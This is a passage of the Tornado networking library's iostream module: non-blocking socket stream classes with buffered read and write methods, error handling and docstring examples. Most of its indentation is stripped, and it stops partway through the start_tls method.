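#     stream = IOStream(socket.socket())
#     yield stream.connect(("example.com", 80))
#     yield stream.write(b"GET / HTTP/1.0\r\nHost: example.com\r\n\r\n")
#     headers = yield stream.read_until(b"\r\n\r\n")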
import collections
import errno
import numbers
import os
import socket
import sys
import re
from tornado.concurrent import TracebackFuture
from tornado import ioloop
from tornado.log import gen_log, app_log
from tornado.netutil import ssl_wrap_socket, ssl_match_hostname, SSLCertificateError, _client_ssl_defaults, _server_ssl_defaults
from tornado import stack_context
from tornado.util import errno_from_exception
try:
from tornado.platform.posix import _set_nonblocking
except ImportError:
_set_nonblocking = None
try:
import ssl
except ImportError:
# ssl is not available on Google App Engine
ssl = None
# These errnos indicate that a non-blocking operation must be retried
# at a later time. On most platforms they're the same value, but on
# some they differ.
_ERRNO_WOULDBLOCK = (errno.EWOULDBLOCK, errno.EAGAIN)
if hasattr(errno, "WSAEWOULDBLOCK"):
_ERRNO_WOULDBLOCK += (errno.WSAEWOULDBLOCK,) # type: ignore
# These errnos indicate that a connection has been abruptly terminated.
# They should be caught and handled less noisily than other errors.
_ERRNO_CONNRESET = (errno.ECONNRESET, errno.ECONNABORTED, errno.EPIPE,
errno.ETIMEDOUT)
if hasattr(errno, "WSAECONNRESET"):
_ERRNO_CONNRESET += (errno.WSAECONNRESET, errno.WSAECONNABORTED, errno.WSAETIMEDOUT) # type: ignore
if sys.platform == 'darwin':
# OSX appears to have a race condition that causes send(2) to return
# EPROTOTYPE if called while a socket is being torn down:
# http://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
# Since the socket is being closed anyway, treat this as an ECONNRESET
# instead of an unexpected error.
_ERRNO_CONNRESET += (errno.EPROTOTYPE,) # type: ignore
# More non-portable errnos:
_ERRNO_INPROGRESS = (errno.EINPROGRESS,)
if hasattr(errno, "WSAEINPROGRESS"):
_ERRNO_INPROGRESS += (errno.WSAEINPROGRESS,) # type: ignore
class StreamClosedError(IOError):
"""Exception raised by `IOStream` methods when the stream is closed.
Note that the close callback is scheduled to run *after* other
callbacks on the stream (to allow for buffered data to be processed),
so you may see this error before you see the close callback.
The ``real_error`` attribute contains the underlying error that caused
the stream to close (if any).
.. versionchanged:: 4.3
Added the ``real_error`` attribute.
"""
def __init__(self, real_error=None):
super(StreamClosedError, self).__init__('Stream is closed')
self.real_error = real_error
class UnsatisfiableReadError(Exception):
"""Exception raised when a read cannot be satisfied.
Raised by ``read_until`` and ``read_until_regex`` with a ``max_bytes``
argument.
"""
pass
class StreamBufferFullError(Exception):
"""Exception raised by `IOStream` methods when the buffer is full.
"""
class BaseIOStream(object):
"""A utility class to write to and read from a non-blocking file or socket.
We support a non-blocking ``write()`` and a family of ``read_*()`` methods.
All of the methods take an optional ``callback`` argument and return a
`.Future` only if no callback is given. When the operation completes,
the callback will be run or the `.Future` will resolve with the data
read (or ``None`` for ``write()``). All outstanding ``Futures`` will
resolve with a `StreamClosedError` when the stream is closed; users
of the callback interface will be notified via
`.BaseIOStream.set_close_callback` instead.
When a stream is closed due to an error, the IOStream's ``error``
attribute contains the exception object.
Subclasses must implement `fileno`, `close_fd`, `write_to_fd`,
`read_from_fd`, and optionally `get_fd_error`.
"""
def __init__(self, io_loop=None, max_buffer_size=None,
read_chunk_size=None, max_write_buffer_size=None):
"""`BaseIOStream` constructor.
:arg io_loop: The `.IOLoop` to use; defaults to `.IOLoop.current`.
Deprecated since Tornado 4.1.
:arg max_buffer_size: Maximum amount of incoming data to buffer;
defaults to 100MB.
:arg read_chunk_size: Amount of data to read at one time from the
underlying transport; defaults to 64KB.
:arg max_write_buffer_size: Amount of outgoing data to buffer;
defaults to unlimited.
.. versionchanged:: 4.0
Add the ``max_write_buffer_size`` parameter. Changed default
``read_chunk_size`` to 64KB.
"""
self.io_loop = io_loop or ioloop.IOLoop.current()
self.max_buffer_size = max_buffer_size or 104857600
# A chunk size that is too close to max_buffer_size can cause
# spurious failures.
self.read_chunk_size = min(read_chunk_size or 65536,
self.max_buffer_size // 2)
self.max_write_buffer_size = max_write_buffer_size
self.error = None
self._read_buffer = collections.deque()
self._write_buffer = collections.deque()
self._read_buffer_size = 0
self._write_buffer_size = 0
self._write_buffer_frozen = False
self._read_delimiter = None
self._read_regex = None
self._read_max_bytes = None
self._read_bytes = None
self._read_partial = False
self._read_until_close = False
self._read_callback = None
self._read_future = None
self._streaming_callback = None
self._write_callback = None
self._write_future = None
self._close_callback = None
self._connect_callback = None
self._connect_future = None
# _ssl_connect_future should be defined in SSLIOStream
# but it's here so we can clean it up in maybe_run_close_callback.
# TODO: refactor that so subclasses can add additional futures
# to be cancelled.
self._ssl_connect_future = None
self._connecting = False
self._state = None
self._pending_callbacks = 0
self._closed = False
def fileno(self):
"""Returns the file descriptor for this stream."""
raise NotImplementedError()
def close_fd(self):
"""Closes the file underlying this stream.
``close_fd`` is called by `BaseIOStream` and should not be called
elsewhere; other users should call `close` instead.
"""
raise NotImplementedError()
def write_to_fd(self, data):
"""Attempts to write ``data`` to the underlying file.
Returns the number of bytes written.
"""
raise NotImplementedError()
def read_from_fd(self):
"""Attempts to read from the underlying file.
Returns ``None`` if there was nothing to read (the socket
returned `~errno.EWOULDBLOCK` or equivalent), otherwise
returns the data. When possible, should return no more than
``self.read_chunk_size`` bytes at a time.
"""
raise NotImplementedError()
def get_fd_error(self):
"""Returns information about any error on the underlying file.
This method is called after the `.IOLoop` has signaled an error on the
file descriptor, and should return an Exception (such as `socket.error`
with additional information, or None if no such information is
available.
"""
return None
def read_until_regex(self, regex, callback=None, max_bytes=None):
"""Asynchronously read until we have matched the given regex.
The result includes the data that matches the regex and anything
that came before it. If a callback is given, it will be run
with the data as an argument; if not, this method returns a
`.Future`.
If ``max_bytes`` is not None, the connection will be closed
if more than ``max_bytes`` bytes have been read and the regex is
not satisfied.
.. versionchanged:: 4.0
Added the ``max_bytes`` argument. The ``callback`` argument is
now optional and a `.Future` will be returned if it is omitted.
"""
future = self._set_read_callback(callback)
self._read_regex = re.compile(regex)
self._read_max_bytes = max_bytes
try:
self._try_inline_read()
except UnsatisfiableReadError as e:
# Handle this the same way as in _handle_events.
gen_log.info("Unsatisfiable read, closing connection: %s" % e)
self.close(exc_info=True)
return future
except:
if future is not None:
# Ensure that the future doesn't log an error because its
# failure was never examined.
future.add_done_callback(lambda f: f.exception())
raise
return future
def read_until(self, delimiter, callback=None, max_bytes=None):
"""Asynchronously read until we have found the given delimiter.
The result includes all the data read including the delimiter.
If a callback is given, it will be run with the data as an argument;
if not, this method returns a `.Future`.
If ``max_bytes`` is not None, the connection will be closed
if more than ``max_bytes`` bytes have been read and the delimiter
is not found.
.. versionchanged:: 4.0
Added the ``max_bytes`` argument. The ``callback`` argument is
now optional and a `.Future` will be returned if it is omitted.
"""
future = self._set_read_callback(callback)
self._read_delimiter = delimiter
self._read_max_bytes = max_bytes
try:
self._try_inline_read()
except UnsatisfiableReadError as e:
# Handle this the same way as in _handle_events.
gen_log.info("Unsatisfiable read, closing connection: %s" % e)
self.close(exc_info=True)
return future
except:
if future is not None:
future.add_done_callback(lambda f: f.exception())
raise
return future
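
    # Added example sketch (names and sizes below are assumptions): in a
    # coroutine, read one CRLF-terminated line and then a fixed-size body:
    #     line = yield stream.read_until(b"\r\n", max_bytes=4096)
    #     body = yield stream.read_bytes(content_length)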
def read_bytes(self, num_bytes, callback=None, streaming_callback=None,
partial=False):
"""Asynchronously read a number of bytes.
If a ``streaming_callback`` is given, it will be called with chunks
of data as they become available, and the final result will be empty.
Otherwise, the result is all the data that was read.
If a callback is given, it will be run with the data as an argument;
if not, this method returns a `.Future`.
If ``partial`` is true, the callback is run as soon as we have
any bytes to return (but never more than ``num_bytes``)
.. versionchanged:: 4.0
Added the ``partial`` argument. The callback argument is now
optional and a `.Future` will be returned if it is omitted.
"""
future = self._set_read_callback(callback)
assert isinstance(num_bytes, numbers.Integral)
self._read_bytes = num_bytes
self._read_partial = partial
self._streaming_callback = stack_context.wrap(streaming_callback)
try:
self._try_inline_read()
except:
if future is not None:
future.add_done_callback(lambda f: f.exception())
raise
return future
def read_until_close(self, callback=None, streaming_callback=None):
"""Asynchronously reads all data from the socket until it is closed.
If a ``streaming_callback`` is given, it will be called with chunks
of data as they become available, and the final result will be empty.
Otherwise, the result is all the data that was read.
If a callback is given, it will be run with the data as an argument;
if not, this method returns a `.Future`.
Note that if a ``streaming_callback`` is used, data will be
read from the socket as quickly as it becomes available; there
is no way to apply backpressure or cancel the reads. If flow
control or cancellation are desired, use a loop with
`read_bytes(partial=True) <.read_bytes>` instead.
.. versionchanged:: 4.0
The callback argument is now optional and a `.Future` will
be returned if it is omitted.
"""
future = self._set_read_callback(callback)
self._streaming_callback = stack_context.wrap(streaming_callback)
if self.closed():
if self._streaming_callback is not None:
self._run_read_callback(self._read_buffer_size, True)
self._run_read_callback(self._read_buffer_size, False)
return future
self._read_until_close = True
try:
self._try_inline_read()
except:
if future is not None:
future.add_done_callback(lambda f: f.exception())
raise
return future
def write(self, data, callback=None):
"""Asynchronously write the given data to this stream.
If ``callback`` is given, we call it when all of the buffered write
data has been successfully written to the stream. If there was
previously buffered write data and an old write callback, that
callback is simply overwritten with this new callback.
If no ``callback`` is given, this method returns a `.Future` that
resolves (with a result of ``None``) when the write has been
completed. If `write` is called again before that `.Future` has
resolved, the previous future will be orphaned and will never resolve.
.. versionchanged:: 4.0
Now returns a `.Future` if no callback is given.
"""
assert isinstance(data, bytes)
self._check_closed()
# We use bool(_write_buffer) as a proxy for write_buffer_size>0,
# so never put empty strings in the buffer.
if data:
if (self.max_write_buffer_size is not None and
self._write_buffer_size + len(data) > self.max_write_buffer_size):
raise StreamBufferFullError("Reached maximum write buffer size")
# Break up large contiguous strings before inserting them in the
# write buffer, so we don't have to recopy the entire thing
# as we slice off pieces to send to the socket.
WRITE_BUFFER_CHUNK_SIZE = 128 * 1024
for i in range(0, len(data), WRITE_BUFFER_CHUNK_SIZE):
self._write_buffer.append(data[i:i + WRITE_BUFFER_CHUNK_SIZE])
self._write_buffer_size += len(data)
if callback is not None:
self._write_callback = stack_context.wrap(callback)
future = None
else:
future = self._write_future = TracebackFuture()
future.add_done_callback(lambda f: f.exception())
if not self._connecting:
self._handle_write()
if self._write_buffer:
self._add_io_state(self.io_loop.WRITE)
self._maybe_add_error_listener()
return future
def set_close_callback(self, callback):
"""Call the given callback when the stream is closed.
This is not necessary for applications that use the `.Future`
interface; all outstanding ``Futures`` will resolve with a
`StreamClosedError` when the stream is closed.
"""
self._close_callback = stack_context.wrap(callback)
self._maybe_add_error_listener()
def close(self, exc_info=False):
"""Close this stream.
If ``exc_info`` is true, set the ``error`` attribute to the current
exception from `sys.exc_info` (or if ``exc_info`` is a tuple,
use that instead of `sys.exc_info`).
"""
if not self.closed():
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
if any(exc_info):
self.error = exc_info[1]
if self._read_until_close:
if (self._streaming_callback is not None and
self._read_buffer_size):
self._run_read_callback(self._read_buffer_size, True)
self._read_until_close = False
self._run_read_callback(self._read_buffer_size, False)
if self._state is not None:
self.io_loop.remove_handler(self.fileno())
self._state = None
self.close_fd()
self._closed = True
self._maybe_run_close_callback()
def _maybe_run_close_callback(self):
# If there are pending callbacks, don't run the close callback
# until they're done (see _maybe_add_error_handler)
if self.closed() and self._pending_callbacks == 0:
futures = []
if self._read_future is not None:
futures.append(self._read_future)
self._read_future = None
if self._write_future is not None:
futures.append(self._write_future)
self._write_future = None
if self._connect_future is not None:
futures.append(self._connect_future)
self._connect_future = None
if self._ssl_connect_future is not None:
futures.append(self._ssl_connect_future)
self._ssl_connect_future = None
for future in futures:
future.set_exception(StreamClosedError(real_error=self.error))
if self._close_callback is not None:
cb = self._close_callback
self._close_callback = None
self._run_callback(cb)
# Delete any unfinished callbacks to break up reference cycles.
self._read_callback = self._write_callback = None
# Clear the buffers so they can be cleared immediately even
# if the IOStream object is kept alive by a reference cycle.
# TODO: Clear the read buffer too; it currently breaks some tests.
self._write_buffer = None
def reading(self):
"""Returns true if we are currently reading from the stream."""
return self._read_callback is not None or self._read_future is not None
def writing(self):
"""Returns true if we are currently writing to the stream."""
return bool(self._write_buffer)
def closed(self):
"""Returns true if the stream has been closed."""
return self._closed
def set_nodelay(self, value):
"""Sets the no-delay flag for this stream.
By default, data written to TCP streams may be held for a time
to make the most efficient use of bandwidth (according to
Nagle's algorithm). The no-delay flag requests that data be
written as soon as possible, even if doing so would consume
additional bandwidth.
This flag is currently defined only for TCP-based ``IOStreams``.
.. versionadded:: 3.1
"""
pass
def _handle_events(self, fd, events):
if self.closed():
gen_log.warning("Got events for closed stream %s", fd)
return
try:
if self._connecting:
# Most IOLoops will report a write failed connect
# with the WRITE event, but SelectIOLoop reports a
# READ as well so we must check for connecting before
# either.
self._handle_connect()
if self.closed():
return
if events & self.io_loop.READ:
self._handle_read()
if self.closed():
return
if events & self.io_loop.WRITE:
self._handle_write()
if self.closed():
return
if events & self.io_loop.ERROR:
self.error = self.get_fd_error()
# We may have queued up a user callback in _handle_read or
# _handle_write, so don't close the IOStream until those
# callbacks have had a chance to run.
self.io_loop.add_callback(self.close)
return
state = self.io_loop.ERROR
if self.reading():
state |= self.io_loop.READ
if self.writing():
state |= self.io_loop.WRITE
if state == self.io_loop.ERROR and self._read_buffer_size == 0:
# If the connection is idle, listen for reads too so
# we can tell if the connection is closed. If there is
# data in the read buffer we won't run the close callback
# yet anyway, so we don't need to listen in this case.
state |= self.io_loop.READ
if state != self._state:
assert self._state is not None, \
"shouldn't happen: _handle_events without self._state"
self._state = state
self.io_loop.update_handler(self.fileno(), self._state)
except UnsatisfiableReadError as e:
gen_log.info("Unsatisfiable read, closing connection: %s" % e)
self.close(exc_info=True)
except Exception:
gen_log.error("Uncaught exception, closing connection.",
exc_info=True)
self.close(exc_info=True)
raise
def _run_callback(self, callback, *args):
def wrapper():
self._pending_callbacks -= 1
try:
return callback(*args)
except Exception:
app_log.error("Uncaught exception, closing connection.",
exc_info=True)
# Close the socket on an uncaught exception from a user callback
# (It would eventually get closed when the socket object is
# gc'd, but we don't want to rely on gc happening before we
# run out of file descriptors)
self.close(exc_info=True)
# Re-raise the exception so that IOLoop.handle_callback_exception
# can see it and log the error
raise
finally:
self._maybe_add_error_listener()
# We schedule callbacks to be run on the next IOLoop iteration
# rather than running them directly for several reasons:
# * Prevents unbounded stack growth when a callback calls an
# IOLoop operation that immediately runs another callback
# * Provides a predictable execution context for e.g.
# non-reentrant mutexes
# * Ensures that the try/except in wrapper() is run outside
# of the application's StackContexts
with stack_context.NullContext():
# stack_context was already captured in callback, we don't need to
# capture it again for IOStream's wrapper. This is especially
# important if the callback was pre-wrapped before entry to
# IOStream (as in HTTPConnection._header_callback), as we could
# capture and leak the wrong context here.
self._pending_callbacks += 1
self.io_loop.add_callback(wrapper)
def _read_to_buffer_loop(self):
# This method is called from _handle_read and _try_inline_read.
try:
if self._read_bytes is not None:
target_bytes = self._read_bytes
elif self._read_max_bytes is not None:
target_bytes = self._read_max_bytes
elif self.reading():
# For read_until without max_bytes, or
# read_until_close, read as much as we can before
# scanning for the delimiter.
target_bytes = None
else:
target_bytes = 0
next_find_pos = 0
# Pretend to have a pending callback so that an EOF in
# _read_to_buffer doesn't trigger an immediate close
# callback. At the end of this method we'll either
# establish a real pending callback via
# _read_from_buffer or run the close callback.
#
# We need two try statements here so that
# pending_callbacks is decremented before the `except`
# clause below (which calls `close` and does need to
# trigger the callback)
self._pending_callbacks += 1
while not self.closed():
# Read from the socket until we get EWOULDBLOCK or equivalent.
# SSL sockets do some internal buffering, and if the data is
# sitting in the SSL object's buffer select() and friends
# can't see it; the only way to find out if it's there is to
# try to read it.
if self._read_to_buffer() == 0:
break
self._run_streaming_callback()
# If we've read all the bytes we can use, break out of
# this loop. We can't just call read_from_buffer here
# because of subtle interactions with the
# pending_callback and error_listener mechanisms.
#
# If we've reached target_bytes, we know we're done.
if (target_bytes is not None and
self._read_buffer_size >= target_bytes):
break
# Otherwise, we need to call the more expensive find_read_pos.
# It's inefficient to do this on every read, so instead
# do it on the first read and whenever the read buffer
# size has doubled.
if self._read_buffer_size >= next_find_pos:
pos = self._find_read_pos()
if pos is not None:
return pos
next_find_pos = self._read_buffer_size * 2
return self._find_read_pos()
finally:
self._pending_callbacks -= 1
def _handle_read(self):
try:
pos = self._read_to_buffer_loop()
except UnsatisfiableReadError:
raise
        except Exception as e:
            # Not every exception carries an errno attribute; guard the access
            # so a failure here cannot skip the close() call below.
            if getattr(e, 'errno', None) != 1:
                gen_log.warning("error on read: %s" % e)
self.close(exc_info=True)
return
if pos is not None:
self._read_from_buffer(pos)
return
else:
self._maybe_run_close_callback()
def _set_read_callback(self, callback):
assert self._read_callback is None, "Already reading"
assert self._read_future is None, "Already reading"
if callback is not None:
self._read_callback = stack_context.wrap(callback)
else:
self._read_future = TracebackFuture()
return self._read_future
def _run_read_callback(self, size, streaming):
if streaming:
callback = self._streaming_callback
else:
callback = self._read_callback
self._read_callback = self._streaming_callback = None
if self._read_future is not None:
assert callback is None
future = self._read_future
self._read_future = None
future.set_result(self._consume(size))
if callback is not None:
assert (self._read_future is None) or streaming
self._run_callback(callback, self._consume(size))
else:
# If we scheduled a callback, we will add the error listener
# afterwards. If we didn't, we have to do it now.
self._maybe_add_error_listener()
def _try_inline_read(self):
"""Attempt to complete the current read operation from buffered data.
If the read can be completed without blocking, schedules the
read callback on the next IOLoop iteration; otherwise starts
listening for reads on the socket.
"""
# See if we've already got the data from a previous read
self._run_streaming_callback()
pos = self._find_read_pos()
if pos is not None:
self._read_from_buffer(pos)
return
self._check_closed()
try:
pos = self._read_to_buffer_loop()
except Exception:
            # If there was an error in _read_to_buffer, we called close() already,
# but couldn't run the close callback because of _pending_callbacks.
# Before we escape from this function, run the close callback if
# applicable.
self._maybe_run_close_callback()
raise
if pos is not None:
self._read_from_buffer(pos)
return
# We couldn't satisfy the read inline, so either close the stream
# or listen for new data.
if self.closed():
self._maybe_run_close_callback()
else:
self._add_io_state(ioloop.IOLoop.READ)
def _read_to_buffer(self):
"""Reads from the socket and appends the result to the read buffer.
Returns the number of bytes read. Returns 0 if there is nothing
to read (i.e. the read returns EWOULDBLOCK or equivalent). On
error closes the socket and raises an exception.
"""
while True:
try:
chunk = self.read_from_fd()
except (socket.error, IOError, OSError) as e:
if errno_from_exception(e) == errno.EINTR:
continue
# ssl.SSLError is a subclass of socket.error
if self._is_connreset(e):
# Treat ECONNRESET as a connection close rather than
# an error to minimize log spam (the exception will
# be available on self.error for apps that care).
self.close(exc_info=True)
return
self.close(exc_info=True)
raise
break
if chunk is None:
return 0
self._read_buffer.append(chunk)
self._read_buffer_size += len(chunk)
if self._read_buffer_size > self.max_buffer_size:
gen_log.error("Reached maximum read buffer size")
self.close()
raise StreamBufferFullError("Reached maximum read buffer size")
return len(chunk)
def _run_streaming_callback(self):
if self._streaming_callback is not None and self._read_buffer_size:
bytes_to_consume = self._read_buffer_size
if self._read_bytes is not None:
bytes_to_consume = min(self._read_bytes, bytes_to_consume)
self._read_bytes -= bytes_to_consume
self._run_read_callback(bytes_to_consume, True)
def _read_from_buffer(self, pos):
"""Attempts to complete the currently-pending read from the buffer.
The argument is either a position in the read buffer or None,
as returned by _find_read_pos.
"""
self._read_bytes = self._read_delimiter = self._read_regex = None
self._read_partial = False
self._run_read_callback(pos, False)
def _find_read_pos(self):
"""Attempts to find a position in the read buffer that satisfies
the currently-pending read.
Returns a position in the buffer if the current read can be satisfied,
or None if it cannot.
"""
if (self._read_bytes is not None and
(self._read_buffer_size >= self._read_bytes or
(self._read_partial and self._read_buffer_size > 0))):
num_bytes = min(self._read_bytes, self._read_buffer_size)
return num_bytes
elif self._read_delimiter is not None:
# Multi-byte delimiters (e.g. '\r\n') may straddle two
# chunks in the read buffer, so we can't easily find them
# without collapsing the buffer. However, since protocols
# using delimited reads (as opposed to reads of a known
# length) tend to be "line" oriented, the delimiter is likely
# to be in the first few chunks. Merge the buffer gradually
# since large merges are relatively expensive and get undone in
# _consume().
if self._read_buffer:
while True:
loc = self._read_buffer[0].find(self._read_delimiter)
if loc != -1:
delimiter_len = len(self._read_delimiter)
self._check_max_bytes(self._read_delimiter,
loc + delimiter_len)
return loc + delimiter_len
if len(self._read_buffer) == 1:
break
_double_prefix(self._read_buffer)
self._check_max_bytes(self._read_delimiter,
len(self._read_buffer[0]))
elif self._read_regex is not None:
if self._read_buffer:
while True:
m = self._read_regex.search(self._read_buffer[0])
if m is not None:
self._check_max_bytes(self._read_regex, m.end())
return m.end()
if len(self._read_buffer) == 1:
break
_double_prefix(self._read_buffer)
self._check_max_bytes(self._read_regex,
len(self._read_buffer[0]))
return None
def _check_max_bytes(self, delimiter, size):
if (self._read_max_bytes is not None and
size > self._read_max_bytes):
raise UnsatisfiableReadError(
"delimiter %r not found within %d bytes" % (
delimiter, self._read_max_bytes))
def _handle_write(self):
while self._write_buffer:
try:
if not self._write_buffer_frozen:
# On windows, socket.send blows up if given a
# write buffer that's too large, instead of just
# returning the number of bytes it was able to
# process. Therefore we must not call socket.send
# with more than 128KB at a time.
_merge_prefix(self._write_buffer, 128 * 1024)
num_bytes = self.write_to_fd(self._write_buffer[0])
if num_bytes == 0:
# With OpenSSL, if we couldn't write the entire buffer,
# the very same string object must be used on the
# next call to send. Therefore we suppress
# merging the write buffer after an incomplete send.
# A cleaner solution would be to set
# SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER, but this is
# not yet accessible from python
# (http://bugs.python.org/issue8240)
self._write_buffer_frozen = True
break
self._write_buffer_frozen = False
_merge_prefix(self._write_buffer, num_bytes)
self._write_buffer.popleft()
self._write_buffer_size -= num_bytes
except (socket.error, IOError, OSError) as e:
if e.args[0] in _ERRNO_WOULDBLOCK:
self._write_buffer_frozen = True
break
else:
if not self._is_connreset(e):
# Broken pipe errors are usually caused by connection
                    # reset, and it's better not to log EPIPE errors to
# minimize log spam
gen_log.warning("Write error on %s: %s",
self.fileno(), e)
self.close(exc_info=True)
return
if not self._write_buffer:
if self._write_callback:
callback = self._write_callback
self._write_callback = None
self._run_callback(callback)
if self._write_future:
future = self._write_future
self._write_future = None
future.set_result(None)
def _consume(self, loc):
if loc == 0:
return b""
_merge_prefix(self._read_buffer, loc)
self._read_buffer_size -= loc
return self._read_buffer.popleft()
def _check_closed(self):
if self.closed():
raise StreamClosedError(real_error=self.error)
def _maybe_add_error_listener(self):
# This method is part of an optimization: to detect a connection that
# is closed when we're not actively reading or writing, we must listen
# for read events. However, it is inefficient to do this when the
# connection is first established because we are going to read or write
# immediately anyway. Instead, we insert checks at various times to
# see if the connection is idle and add the read listener then.
if self._pending_callbacks != 0:
return
if self._state is None or self._state == ioloop.IOLoop.ERROR:
if self.closed():
self._maybe_run_close_callback()
elif (self._read_buffer_size == 0 and
self._close_callback is not None):
self._add_io_state(ioloop.IOLoop.READ)
def _add_io_state(self, state):
"""Adds `state` (IOLoop.{READ,WRITE} flags) to our event handler.
Implementation notes: Reads and writes have a fast path and a
slow path. The fast path reads synchronously from socket
buffers, while the slow path uses `_add_io_state` to schedule
an IOLoop callback. Note that in both cases, the callback is
run asynchronously with `_run_callback`.
To detect closed connections, we must have called
`_add_io_state` at some point, but we want to delay this as
much as possible so we don't have to set an `IOLoop.ERROR`
listener that will be overwritten by the next slow-path
operation. As long as there are callbacks scheduled for
fast-path ops, those callbacks may do more reads.
If a sequence of fast-path ops do not end in a slow-path op,
(e.g. for an @asynchronous long-poll request), we must add
the error handler. This is done in `_run_callback` and `write`
(since the write callback is optional so we can have a
fast-path write with no `_run_callback`)
"""
if self.closed():
# connection has been closed, so there can be no future events
return
if self._state is None:
self._state = ioloop.IOLoop.ERROR | state
with stack_context.NullContext():
self.io_loop.add_handler(
self.fileno(), self._handle_events, self._state)
elif not self._state & state:
self._state = self._state | state
self.io_loop.update_handler(self.fileno(), self._state)
def _is_connreset(self, exc):
"""Return true if exc is ECONNRESET or equivalent.
May be overridden in subclasses.
"""
return (isinstance(exc, (socket.error, IOError)) and
errno_from_exception(exc) in _ERRNO_CONNRESET)
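# --- Illustrative sketch (not part of the upstream module) -------------------
# The Future-returning read/write methods of BaseIOStream above are normally
# consumed from a coroutine rather than with explicit callbacks. A minimal
# echo loop might look like this; ``stream`` is assumed to be an already
# connected stream, and the 64 KB cap passed to read_until is an arbitrary
# example value.
def _example_echo_loop(stream):
    from tornado import gen
    @gen.coroutine
    def echo():
        try:
            while True:
                line = yield stream.read_until(b"\r\n", max_bytes=64 * 1024)
                yield stream.write(b"echo: " + line)
        except StreamClosedError:
            pass  # connection closed (or the max_bytes limit was hit)
    return echo()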
class IOStream(BaseIOStream):
r"""Socket-based `IOStream` implementation.
This class supports the read and write methods from `BaseIOStream`
plus a `connect` method.
The ``socket`` parameter may either be connected or unconnected.
For server operations the socket is the result of calling
`socket.accept <socket.socket.accept>`. For client operations the
socket is created with `socket.socket`, and may either be
connected before passing it to the `IOStream` or connected with
`IOStream.connect`.
A very simple (and broken) HTTP client using this class:
.. testcode::
import tornado.ioloop
import tornado.iostream
import socket
def send_request():
stream.write(b"GET / HTTP/1.0\r\nHost: friendfeed.com\r\n\r\n")
stream.read_until(b"\r\n\r\n", on_headers)
def on_headers(data):
headers = {}
for line in data.split(b"\r\n"):
parts = line.split(b":")
if len(parts) == 2:
headers[parts[0].strip()] = parts[1].strip()
stream.read_bytes(int(headers[b"Content-Length"]), on_body)
def on_body(data):
print(data)
stream.close()
tornado.ioloop.IOLoop.current().stop()
if __name__ == '__main__':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
stream = tornado.iostream.IOStream(s)
stream.connect(("friendfeed.com", 80), send_request)
tornado.ioloop.IOLoop.current().start()
.. testoutput::
:hide:
"""
def __init__(self, socket, *args, **kwargs):
self.socket = socket
self.socket.setblocking(False)
super(IOStream, self).__init__(*args, **kwargs)
def fileno(self):
return self.socket
def close_fd(self):
self.socket.close()
self.socket = None
def get_fd_error(self):
errno = self.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_ERROR)
return socket.error(errno, os.strerror(errno))
def read_from_fd(self):
try:
chunk = self.socket.recv(self.read_chunk_size)
except socket.error as e:
if e.args[0] in _ERRNO_WOULDBLOCK:
return None
else:
raise
if not chunk:
self.close()
return None
return chunk
def write_to_fd(self, data):
return self.socket.send(data)
def connect(self, address, callback=None, server_hostname=None):
"""Connects the socket to a remote address without blocking.
May only be called if the socket passed to the constructor was
not previously connected. The address parameter is in the
same format as for `socket.connect <socket.socket.connect>` for
the type of socket passed to the IOStream constructor,
e.g. an ``(ip, port)`` tuple. Hostnames are accepted here,
but will be resolved synchronously and block the IOLoop.
If you have a hostname instead of an IP address, the `.TCPClient`
class is recommended instead of calling this method directly.
`.TCPClient` will do asynchronous DNS resolution and handle
both IPv4 and IPv6.
If ``callback`` is specified, it will be called with no
arguments when the connection is completed; if not this method
returns a `.Future` (whose result after a successful
connection will be the stream itself).
In SSL mode, the ``server_hostname`` parameter will be used
for certificate validation (unless disabled in the
``ssl_options``) and SNI (if supported; requires Python
2.7.9+).
Note that it is safe to call `IOStream.write
<BaseIOStream.write>` while the connection is pending, in
which case the data will be written as soon as the connection
is ready. Calling `IOStream` read methods before the socket is
connected works on some platforms but is non-portable.
.. versionchanged:: 4.0
If no callback is given, returns a `.Future`.
.. versionchanged:: 4.2
SSL certificates are validated by default; pass
``ssl_options=dict(cert_reqs=ssl.CERT_NONE)`` or a
suitably-configured `ssl.SSLContext` to the
`SSLIOStream` constructor to disable.
"""
self._connecting = True
if callback is not None:
self._connect_callback = stack_context.wrap(callback)
future = None
else:
future = self._connect_future = TracebackFuture()
try:
self.socket.connect(address)
except socket.error as e:
# In non-blocking mode we expect connect() to raise an
# exception with EINPROGRESS or EWOULDBLOCK.
#
# On freebsd, other errors such as ECONNREFUSED may be
# returned immediately when attempting to connect to
# localhost, so handle them the same way as an error
# reported later in _handle_connect.
if (errno_from_exception(e) not in _ERRNO_INPROGRESS and
errno_from_exception(e) not in _ERRNO_WOULDBLOCK):
if future is None:
gen_log.warning("Connect error on fd %s: %s",
self.socket.fileno(), e)
self.close(exc_info=True)
return future
self._add_io_state(self.io_loop.WRITE)
return future
def start_tls(self, server_side, ssl_options=None, server_hostname=None):
"""Convert this `IOStream` to an `SSLIOStream`.
This enables protocols that begin in clear-text mode and
switch to SSL after some initial negotiation (such as the
``STARTTLS`` extension to SMTP and IMAP).
This method cannot be used if there are outstanding reads
or writes on the stream, or if there is any data in the
IOStream's buffer (data in the operating system's socket
buffer is allowed). This means it must generally be used
immediately after reading or writing the last clear-text
data. It can also be used immediately after connecting,
before any reads or writes.
The ``ssl_options`` argument may be either an `ssl.SSLContext`
object or a dictionary of keyword arguments for the
`ssl.wrap_socket` function. The ``server_hostname`` argument
will be used for certificate validation unless disabled
in the ``ssl_options``.
This method returns a `.Future` whose result is the new
`SSLIOStream`. After this method has been called,
any other operation on the original stream is undefined.
If a close callback is defined on this stream, it will be
transferred to the new stream.
.. versionadded:: 4.0
.. versionchanged:: 4.2
SSL certificates are validated by default; pass
``ssl_options=dict(cert_reqs=ssl.CERT_NONE)`` or a
suitably-configured `ssl.SSLContext` to disable.
"""
if (self._read_callback or self._read_future or
self._write_callback or self._write_future or
self._connect_callback or self._connect_future or
self._pending_callbacks or self._closed or
self._read_buffer or self._write_buffer):
raise ValueError("IOStream is not idle; cannot convert to SSL")
if ssl_options is None:
if server_side:
ssl_options = _server_ssl_defaults
else:
ssl_options = _client_ssl_defaults
socket = self.socket
self.io_loop.remove_handler(socket)
self.socket = None
socket = ssl_wrap_socket(socket, ssl_options,
server_hostname=server_hostname,
server_side=server_side,
do_handshake_on_connect=False)
